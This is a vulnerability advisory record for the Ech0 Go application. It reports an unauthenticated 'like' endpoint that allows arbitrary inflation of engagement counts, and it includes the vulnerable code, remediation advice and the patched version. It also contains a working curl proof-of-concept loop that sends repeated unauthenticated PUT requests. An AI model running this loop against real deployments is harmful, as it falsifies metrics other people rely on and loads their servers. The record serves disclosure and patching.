{"id":"CVE-2026-79668","aliases":["GHSA-rgj7-vg8v-j4wr","GO-2026-5623"],"title":"Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation","summary":"Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation","severity":"medium","cvss":5.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","vendor":"lin-snow","product":"github.com/lin-snow/ech0","ecosystem":"go","affected":["github.com/lin-snow/ech0 < 1.4.8-0.20260503040728-a7e8b8e84bd1"],"patched":["github.com/lin-snow/ech0 1.4.8-0.20260503040728-a7e8b8e84bd1"],"published":"2026-05-07","updated":"2026-08-27","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-rgj7-vg8v-j4wr","references":[{"url":"https://github.com/lin-snow/Ech0/security/advisories/GHSA-rgj7-vg8v-j4wr"},{"url":"https://github.com/lin-snow/Ech0/commit/a7e8b8e84bd1e3db090dfb720f2c6c433356b442"},{"url":"https://github.com/lin-snow/Ech0"}],"tags":["osv","go"],"epss":0.00256,"epssPercentile":0.17559,"ingestedAt":"2026-08-27T19:27:47.618Z","slug":"CVE-2026-79668","body":"## Overview\n\n### Summary\n\n**No authentication** is required to invoke **`PUT /api/echo/like/:id`**. The handler is registered on the **public** router group. The service increments **`fav_count`** for the given echo **without** checking identity, **without** a per-user limit, and **without** CSRF tokens. A remote client can **arbitrarily inflate** like metrics with repeated requests.\n\n### Description\n\n**Root cause:** The like endpoint is explicitly public (`PublicRouterGroup`). `LikeEcho` in the service layer only runs a repository increment inside a transaction—no viewer/user binding.\n\n**Security boundary that fails:** **Integrity** of engagement metrics (likes) and any trust that “likes” represent distinct or authenticated users.\n\n**Exploitation:** Discover or guess a public echo UUID (timeline, API, share link) → send **unauthenticated** `PUT` repeatedly → **`fav_count`** increases linearly.\n\n### Affected files\n\n| Public route registration | `internal/router/echo.go` |\n| Like mutation (no auth check) | `internal/service/echo/echo.go` |\n| Handler | `internal/handler/echo/echo.go` |\n\n### Vulnerable / relevant code\n\n**Public PUT route:**\n\n```11:13:Ech0/internal/router/echo.go\n\t// Public\n\tappRouterGroup.PublicRouterGroup.PUT(\"/echo/like/:id\", h.EchoHandler.LikeEcho())\n\tappRouterGroup.PublicRouterGroup.GET(\"/tags\", h.EchoHandler.GetAllTags())\n```\n\n**Service does not use viewer / rate limit:**\n\n```244:248:Ech0/internal/service/echo/echo.go\nfunc (echoService *EchoService) LikeEcho(ctx context.Context, id string) error {\n\treturn echoService.transactor.Run(ctx, func(txCtx context.Context) error {\n\t\treturn echoService.echoRepository.LikeEcho(txCtx, id)\n\t})\n}\n```\n\n### Execution flow\n\n1. Client resolves `ECHO_ID` (e.g. `GET /api/echo/page` with any valid token, or from UI).\n2. Client sends **`PUT /api/echo/like/{ECHO_ID}`** with **no** `Authorization` header.\n3. Gin matches **public** route → handler → `EchoService.LikeEcho` → DB increments **`fav_count`**.\n4. Repeat N times → count increases by N.\n\n### Proof of concept\n\n```bash\nBASE=\"http://127.0.0.1:6277\"\n\nOWNER_TOKEN=$(curl -sS -X POST \"$BASE/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"owner\",\"password\":\"OwnerPass123\"}' | jq -r '.data')\n\nECHO_ID=$(curl -sS \"$BASE/api/echo/page?page=1&page_size=1\" \\\n  -H \"Authorization: Bearer $OWNER_TOKEN\" | jq -r '.data.items[0].id')\n\n# Single unauthenticated like\ncurl -sS -w \"\\nHTTP:%{http_code}\\n\" -X PUT \"$BASE/api/echo/like/$ECHO_ID\"\n\n# Inflate (e.g. 55 times); expect HTTP 200 each time\nfor i in $(seq 1 55); do\n  curl -sS -o /dev/null -w \"%{http_code}\\n\" -X PUT \"$BASE/api/echo/like/$ECHO_ID\"\ndone\n\n# Observe fav_count\ncurl -sS \"$BASE/api/echo/$ECHO_ID\" | jq '.data | {id, fav_count}'\n```\n\n**Observed proof (manual test):**\n\n- Each unauthenticated `PUT` returned **HTTP `200`** with success JSON (e.g. `点赞Echo成功`, `code:1`).\n- **`fav_count`** increased to **113** , demonstrating **linear inflation from one client** with **no authentication**.\n<img width=\"1109\" height=\"188\" alt=\"Screenshot 2026-04-01 105522\" src=\"https://github.com/user-attachments/assets/a725cf10-d20b-45a1-95bb-2e8ea396c08c\" />\n\n\n### Impact\n\n**Like counts and ranking/social proof** can be falsified; feeds or “popular” logic tied to `fav_count` are untrustworthy. \nhigh-volume loops add DB write load; possible abuse against availability at scale. \n\n**Attacker capability:** Anyone on the network can manipulate **public** engagement metrics for any known echo id. Combined with permissive **CORS** browsers could automate cross-origin requests.\n\n## Remediation \n Require authentication for likes and enforce **one like per principal**, **or** keep anonymous likes but add **rate limiting**, **proof-of-work / captcha**, or **signed tokens** tied to anon sessions; document that counts are **not** auditor-grade metrics.\n\n## Affected packages\n\n- `github.com/lin-snow/ech0 < 1.4.8-0.20260503040728-a7e8b8e84bd1`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/lin-snow/ech0 1.4.8-0.20260503040728-a7e8b8e84bd1`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}